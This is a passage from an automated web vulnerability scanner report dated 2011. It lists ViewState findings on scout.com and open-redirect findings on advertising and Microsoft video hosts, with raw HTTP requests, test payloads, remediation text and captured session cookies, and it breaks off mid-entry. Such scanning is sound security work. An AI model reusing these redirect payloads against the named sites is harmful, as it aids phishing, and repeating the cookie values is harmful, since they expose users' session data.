User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:51 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18927

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.18. http://www.scout.com/3/privacy-policy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/privacy-policy.html

Request

GET /3/privacy-policy.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.19. http://www.scout.com/3/recruiting-links.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/recruiting-links.html

Request

GET /3/recruiting-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12567

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.20. http://www.scout.com/3/security-information.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/security-information.html

Request

GET /3/security-information.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13553

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Security Information</title>
<meta http-e
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.21. http://www.scout.com/3/terms-of-service.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/terms-of-service.html

Request

GET /3/terms-of-service.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

14.22. http://www.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

14.23. http://www.scout.com/search.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Request

GET /search.aspx?s=143 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

14.24. http://www.scout.com/widgets/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scout.com
Path:	/widgets/

Request

GET /widgets/ HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:27 GMT
Last-Modified: Fri, 28 Jan 2011 00:49:27 GMT
ETag: "1CBBE8536D44580"
Content-Type: text/html
Content-Length: 14619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

15. Open redirection previous next
There are 11 instances of this issue:

http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]
http://developer.windowsphone.com/ [name of an arbitrarily supplied request parameter]
http://go.microsoft.com/fwlink/ [name of an arbitrarily supplied request parameter]
http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]
http://jp.video.redacted/ [name of an arbitrarily supplied request parameter]
http://latino.video.redacted/ [name of an arbitrarily supplied request parameter]
http://ninemsn.video.redacted/ [name of an arbitrarily supplied request parameter]
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]
http://video.fr.sympatico.redacted/ [name of an arbitrarily supplied request parameter]
http://video.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

15.1. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cmap.am.ace.advertising.com
Path:	/amcm.ashx

Issue detail

The value of the admeld_callback request parameter is used to perform an HTTP redirect. The payload http%3a//a9b5c9e7d56de789a/a%3fhttp%3a//tag.admeld.com/match was submitted in the admeld_callback parameter. This caused a redirection to the following URL:

http://a9b5c9e7d56de789a/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=0&expiration=1296940074

Request

GET /amcm.ashx?admeld_adprovider_id=1&admeld_call_type=redirect&admeld_callback=http%3a//a9b5c9e7d56de789a/a%3fhttp%3a//tag.admeld.com/match HTTP/1.1
Host: cmap.am.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://a9b5c9e7d56de789a/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=0&expiration=1296940074
Cache-Control: private, max-age=3600
Expires: Sun, 30 Jan 2011 03:07:54 GMT
Content-Length: 0

15.2. http://developer.windowsphone.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://developer.windowsphone.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aef13bb7348a0a2ce/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://create.msdn.com?.aef13bb7348a0a2ce/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.aef13bb7348a0a2ce/=1 HTTP/1.1
Host: developer.windowsphone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://create.msdn.com?.aef13bb7348a0a2ce/=1
Server: Microsoft-IIS/7.0
p3p: CP="NOI CURa TAIa INT"
Date: Sun, 30 Jan 2011 16:30:29 GMT
Connection: close
Content-Length: 167

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://create.msdn.com?.aef13bb7348a0a2ce/=1">here</a></body>

15.3. http://go.microsoft.com/fwlink/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a8f7c1e946cdd6794/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.redacted?.a8f7c1e946cdd6794/=1

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /fwlink/?LinkId=69157&.a8f7c1e946cdd6794/=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: go.microsoft.com
Cookie: MSID=Microsoft.CreationDate=01/01/2011 01:19:35&Microsoft.LastVisitDate=01/01/2011 01:19:36&Microsoft.VisitStartDate=01/01/2011 01:19:35&Microsoft.CookieId=5936fd78-823e-4d23-86ed-4e6db6ac8f1c&Microsoft.TokenId=f70fdaf0-f92a-4b5d-a32e-37393a50bd2e&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=WEjTRtQyE2RbGPr3wSXz7nNZUkmlpMF2zgdRrAQjDGrLow75IYgCoKPp0Dke4BARdRMhysBBkqBfjNbGEHMdiBoYU7Kc2hHNjygSbx0kJHl+gULQGlgpsbeVR22upGOm3R8L75QIpsrYykybGJR6KYIIzSOuuNg+yHf6rGhXPyDcFHrRe8gLXYd6p5/dRFiJ0EgqCxmw2x7At0+U3LHgCUJYHEZoS8/B9AS5XPcUHBRc6SFtOFBA6q8Yis5b0yWZrKZLqzuO4ySTFg5EddPpV1r0uOlHxnGcKcc1opZVkrUa7KWeyZBlhT7lqgHZlbNPy7A+iog+s9p1VCpFewEK/lBrDaxq11L75hRaOt7CSuL5y66/DPGn8Kw6rszAiqpXWn5WRjAd2w0EndnN86RsTWwg8aIWj601qIKKmpENPTmUjHSrgNC5F5BRsOZxFFm2FRUNVHM0L+G3xZMkxqdzdnz2F8jkCcwvJmGuDTeOzRH4Nwh+U3W7zNFfJIiCNpr1qToar8E9OUWljynFuensTH2QidHS8+fpvsHVJG7bwy4=&Microsoft.MicrosoftId=0284-8242-0555-1674; MC1=GUID=5b046e389ed92e4ea31425cd07b41623&HASH=386e&LV=201012&V=3; A=I&I=AxUFAAAAAADnCAAA1xAOwzpNh6/jVe+nUDXygw!!; MUID=AD04D6F8B2FF44629973BD0674351135; ixpLightBrowser=0

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 157
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 16:40:28 GMT
Location: http://www.redacted?.a8f7c1e946cdd6794/=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:41:27 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.redacted?.a8f7c1e946cdd6794/=1">here</a>.</h2>
</body></html>

15.4. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//aefdf45cccfdf6a24/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://aefdf45cccfdf6a24/a?1=1

Request

GET /getuid?http%3a//aefdf45cccfdf6a24/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#Qdqc@TwKrL$L2pv>3u[KE^pd=S(K$r@Fp>9H; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 02:08:30 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:30 GMT; domain=.adnxs.com; HttpOnly
Location: http://aefdf45cccfdf6a24/a?1=1
Date: Sun, 30 Jan 2011 02:08:30 GMT
Content-Length: 0
Connection: close

15.5. http://jp.video.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://jp.video.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .ab9ee8914f626bc99/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://video.redacted?mkt=ja-jp&.ab9ee8914f626bc99/=1

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.ab9ee8914f626bc99/=1 HTTP/1.1
Host: jp.video.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:09:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=ja-jp&.ab9ee8914f626bc99/=1
Cache-Control: private
Content-Length: 0

15.6. http://latino.video.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://latino.video.msn.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aee7ddd5962f48d29/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://video.redacted?mkt=es-us&brand=latino&.aee7ddd5962f48d29/=1

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.aee7ddd5962f48d29/=1 HTTP/1.1
Host: latino.video.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:09:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: L02
Location: http://video.redacted?mkt=es-us&brand=latino&.aee7ddd5962f48d29/=1
Cache-Control: private
Content-Length: 0

15.7. http://ninemsn.video.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ninemsn.video.msn.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af86b8eda8e8b4b2a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://video.redacted?mkt=en-au&brand=ninemsn&.af86b8eda8e8b4b2a/=1

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.af86b8eda8e8b4b2a/=1 HTTP/1.1
Host: ninemsn.video.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:17:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=en-au&brand=ninemsn&.af86b8eda8e8b4b2a/=1
Cache-Control: private
Content-Length: 0

15.8. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The value of the trg request parameter is used to perform an HTTP redirect. The payload http%3a//a24bb191d3f37d4f6/a%3f was submitted in the trg parameter. This caused a redirection to the following URL:

http://a24bb191d3f37d4f6/a?

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http%3a//a24bb191d3f37d4f6/a%3f HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://a24bb191d3f37d4f6/a?
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 02:18:24 GMT
Connection: close
Set-Cookie: C2=wpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/
Set-Cookie: F1=BAnyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://a24bb191d3f37d4f6/a?">here</a>.</h2>
</body></html>

15.9. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

